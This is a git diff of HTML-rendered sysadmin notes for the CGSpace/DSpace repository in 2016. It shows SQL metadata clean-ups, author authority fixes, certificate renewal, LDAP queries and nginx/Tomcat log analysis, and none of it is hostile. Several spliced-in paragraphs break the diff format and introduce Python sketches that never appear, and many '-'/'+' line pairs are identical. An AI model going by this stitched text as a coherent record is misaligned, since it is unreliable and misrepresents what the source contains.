You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
-
+
@@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
- You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
- Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
-dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
So the only difference is the “confidence”
Ok, well THAT is interesting:
-dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
+dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
- And now an actually relevant example:
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
count
-------
707
(1 row)
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
count
-------
253
@@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
- Trying something experimental:
-dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
UPDATE 960
- And then re-indexing authority and Discovery…?
@@ -244,7 +244,7 @@ UPDATE 960
- Looks like this is all we need: https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies
- I wrote an XPath expression to extract the ILRI subjects from input-forms.xml (from the xmlstarlet package):
-$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
+$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
- Write to Atmire about the use of atmire.orcid.id to see if we can change it
- Seems to be a virtual field that is queried from the authority cache… hmm
@@ -263,9 +263,9 @@ UPDATE 960
- It looks like the values are documented in Choices.java
- Experiment with setting all 960 CCAFS author values to be 500:
-dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
-dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
UPDATE 960
- After the database edit, I did a full Discovery re-index
@@ -320,7 +320,7 @@ UPDATE 960
- CGSpace’s HTTPS certificate expired last night and I didn’t notice, had to renew:
-
# /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
+# /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
- I really need to fix that cron job…
@@ -328,8 +328,8 @@ UPDATE 960
- Run the replacements/deletes for
dc.description.sponsorship
(investors) on CGSpace:
-$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
-$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
+$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
+$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
- The scripts for this are here:
@@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
- Run all cleanups and deletions of
dc.contributor.corporate
on CGSpace:
-$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
-$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
-$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
- Re-deploy CGSpace and DSpace Test with latest June changes
- Now the sharing and Altmetric bits are more prominent:
@@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
- Wow, there are 95 authors in the database who have ‘,’ at the end of their name:
-
# select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
+# select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
- We need to use something like this to fix them, need to write a proper regex later:
-# update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
+# update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html
index 041966912..5577bcce7 100644
--- a/docs/2016-07/index.html
+++ b/docs/2016-07/index.html
@@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
-
+
@@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
Add dc.description.sponsorship
to Discovery sidebar facets and make investors clickable in item view (#232)
I think this query should find and replace all authors that have “,” at the end of their names:
-dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
UPDATE 95
-dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
text_value
------------
(0 rows)
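The trailing-comma pattern in the query above can be tried outside the database before running an update. This is a minimal sketch in Python, assuming the pattern behaves the same way in Python's `re` module as in PostgreSQL for these simple inputs. The function name and all sample values other than `Poole, J,` are hypothetical.

```python
import re

# Same pattern as in the SQL: lazily capture everything before one trailing comma.
TRAILING_COMMA = re.compile(r"(^.+?),$")


def strip_trailing_comma(name: str) -> str:
    """Return the name without a single trailing comma; other values pass through unchanged."""
    return TRAILING_COMMA.sub(r"\1", name)


# Hypothetical sample values, apart from 'Poole, J,' which appears in the notes.
samples = ["Poole, J,", "Grace, D.", "Orth, A.,"]
for original in samples:
    print(repr(original), "->", repr(strip_trailing_comma(original)))
```

Because `.+?` needs at least one character, a value consisting only of a comma is left alone rather than turned into an empty string.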
@@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
We really only need statistics
and authority
but meh
Fix metadata for species on DSpace Test:
-$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
+$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
- Will run later on CGSpace
- A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is “ungraded”
@@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
- Delete 23 blank metadata values from CGSpace:
-
cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 23
- Complete phase three of metadata migration, for the following fields:
@@ -188,9 +188,9 @@ DELETE 23
- Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)
-$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
-$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
-$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
- I then ran all server updates and rebooted the server
@@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- I suspect it’s someone hitting REST too much:
-# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142
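The per-client tally produced by the `awk | sort | uniq -c` pipeline above can also be sketched in Python, which may be easier to extend later (for example to filter by path). This is only an illustration: the function name is hypothetical, and the sample lines reuse the IPs shown above with made-up request details.

```python
from collections import Counter


def top_clients(lines, n=3):
    """Count the first whitespace-separated field of each line and return the n most frequent."""
    counts = Counter(line.split()[0] for line in lines if line.strip())
    return counts.most_common(n)


# Hypothetical log lines: the IPs come from the output above, the rest is invented.
sample = [
    '70.32.99.142 "GET /rest/items HTTP/1.1" 200',
    '181.118.144.29 "GET /rest/collections HTTP/1.1" 200',
    '70.32.99.142 "GET /rest/items HTTP/1.1" 200',
    '66.249.78.38 "GET /rest/communities HTTP/1.1" 200',
    '70.32.99.142 "GET /rest/items HTTP/1.1" 200',
    '181.118.144.29 "GET /rest/collections HTTP/1.1" 200',
]

for ip, hits in top_clients(sample):
    print(hits, ip)
```

Note that `most_common` lists the busiest client first, whereas the shell pipeline sorts ascending and uses `tail`, so the order is reversed relative to the output above.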
diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html
index d2b0f5be6..8ee34ba3e 100644
--- a/docs/2016-08/index.html
+++ b/docs/2016-08/index.html
@@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
-
+
@@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
Fix item display incorrectly displaying Species when Breeds were present (#260)
Experiment with fixing more authors, like Delia Grace:
-dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
+dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
2016-08-06
- Finally figured out how to remove “View/Open” and “Bitstreams” from the item view
@@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
- Install latest Oracle Java 8 JDK
- Create
setenv.sh
in Tomcat 8 libexec/bin
directory:
-CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
-CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
+CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
+CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
@@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
- Fix “CONGO,DR” country name in
input-forms.xml
(#264)
- Also need to fix existing records using the incorrect form in the database:
-dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
+dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
- I asked a question on the DSpace mailing list about updating “preferred” forms of author names from ORCID
@@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB
They said I should delete the Atmire migrations
-dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
-dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
+dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
+dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
- After that DSpace starts up but XMLUI now has unrelated issues that I need to solve!
-org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
+org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
- Looks like we’re missing some stuff in the XMLUI module’s
sitemap.xmap
, as well as in each of our XMLUI themes
@@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
- Clean up and import 48 CCAFS records into DSpace Test
- SQL to get all journal titles from dc.source (55), since it’s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:
-dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
+dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
2016-08-25
- Atmire suggested adding a missing bean to
dspace/config/spring/api/atmire-cua.xml
but it doesn’t help:
...
-Error creating bean with name 'MetadataStorageInfoService'
+Error creating bean with name 'MetadataStorageInfoService'
...
- Atmire sent an updated version of
dspace/config/spring/api/atmire-cua.xml
and now XMLUI starts but gives a null pointer exception:
@@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
- Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:
$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
-$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
- Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs
diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html
index 1cc0df08e..1caf406c8 100644
--- a/docs/2016-09/index.html
+++ b/docs/2016-09/index.html
@@ -14,7 +14,7 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
" />
@@ -32,9 +32,9 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
"/>
-
+
@@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=or
We had been using DC=ILRI
to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
- User who has been migrated to the root vs user still in the hierarchical structure:
@@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
-$ psql dspacetest -c 'alter user dspacetest createuser;'
+$ psql dspacetest -c 'alter user dspacetest createuser;'
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
-$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
+$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
- Some names that I thought I fixed in July seem not to be:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@@ -163,12 +163,12 @@ $ vacuumdb dspacetest
- At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45
-dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
UPDATE 69
- And for Peter Ballantyne:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@@ -180,26 +180,26 @@ UPDATE 69
- Again, a few have the correct ORCID, but there should only be one authority…
-dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
UPDATE 58
- And for me:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
-dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
+dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
UPDATE 11
- And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:
-dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
UPDATE 166
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
- After one week of logging TLS connections on CGSpace:
-# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
-# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
+# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
- So this represents
0.02%
of 1.16M connections over a one-week period
- Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:
-value + "__description:" + cells["dc.type"].value
+value + "__description:" + cells["dc.type"].value
- This gives you, for example:
Mainstreaming gender in agricultural R&D.pdf__description:Brief
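For reference, the same filename transformation can be written outside OpenRefine. The sketch below assumes the filename and the `dc.type` value are already available as plain strings; the function name is hypothetical.

```python
def with_description(filename: str, dc_type: str) -> str:
    """Append a SAFBuilder-style description suffix built from the item's type."""
    return f"{filename}__description:{dc_type}"


print(with_description("Mainstreaming gender in agricultural R&D.pdf", "Brief"))
```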
@@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8
We should definitely clean filenames so they don’t use characters that are tricky to process in CSV and shell scripts, like: ,
, '
, and "
-value.replace("'","").replace(",","").replace('"','')
+value.replace("'","").replace(",","").replace('"','')
- I need to write a Python script to match that for renaming files in the file system
- When importing SAF bundles it seems you can specify the target collection on the command line using
-c 10568/4003
or in the collections
file inside each item in the bundle
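The Python script mentioned above, for renaming files on disk to match the OpenRefine cleanup, could look roughly like this. It is a sketch under assumptions, not the script that was eventually written: the function names and the dry-run default are hypothetical, and it does not guard against two files collapsing to the same cleaned name.

```python
from pathlib import Path

# Characters removed by the OpenRefine expression: single quote, comma, double quote.
UNSAFE = str.maketrans("", "", "',\"")


def clean_name(name: str) -> str:
    """Mirror value.replace("'","").replace(",","").replace('"','')."""
    return name.translate(UNSAFE)


def rename_clean(directory: str, dry_run: bool = True):
    """Return (old, new) name pairs for files needing cleanup; rename them unless dry_run."""
    changes = []
    for path in sorted(Path(directory).iterdir()):
        new_name = clean_name(path.name)
        if path.is_file() and new_name != path.name:
            changes.append((path.name, new_name))
            if not dry_run:
                # Caution: this overwrites on POSIX if the target name already exists.
                path.rename(path.with_name(new_name))
    return changes
```

Running `rename_clean("/path/to/files")` first with the default `dry_run=True` prints nothing and changes nothing; it only returns the planned renames so they can be checked against the cleaned CSV.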
@@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
- Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the
tomcat7
user, and deleting the bundle, for each collection’s items:
$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
-$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
2016-09-07
@@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- I restarted Tomcat and it was ok again
- CGSpace crashed a few hours later, errors from
catalina.out
:
-Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
- We haven’t seen that in quite a while…
- Indeed, in a month of logs it only occurs 15 times:
-# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
15
- I also see a bunch of errors from dspace.log:
@@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- Looking at REST requests, it seems there is one IP hitting us nonstop:
-# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
-# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- And more heap space errors:
-# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
19
- There are no more REST requests since the last crash, so maybe there are other things causing this.
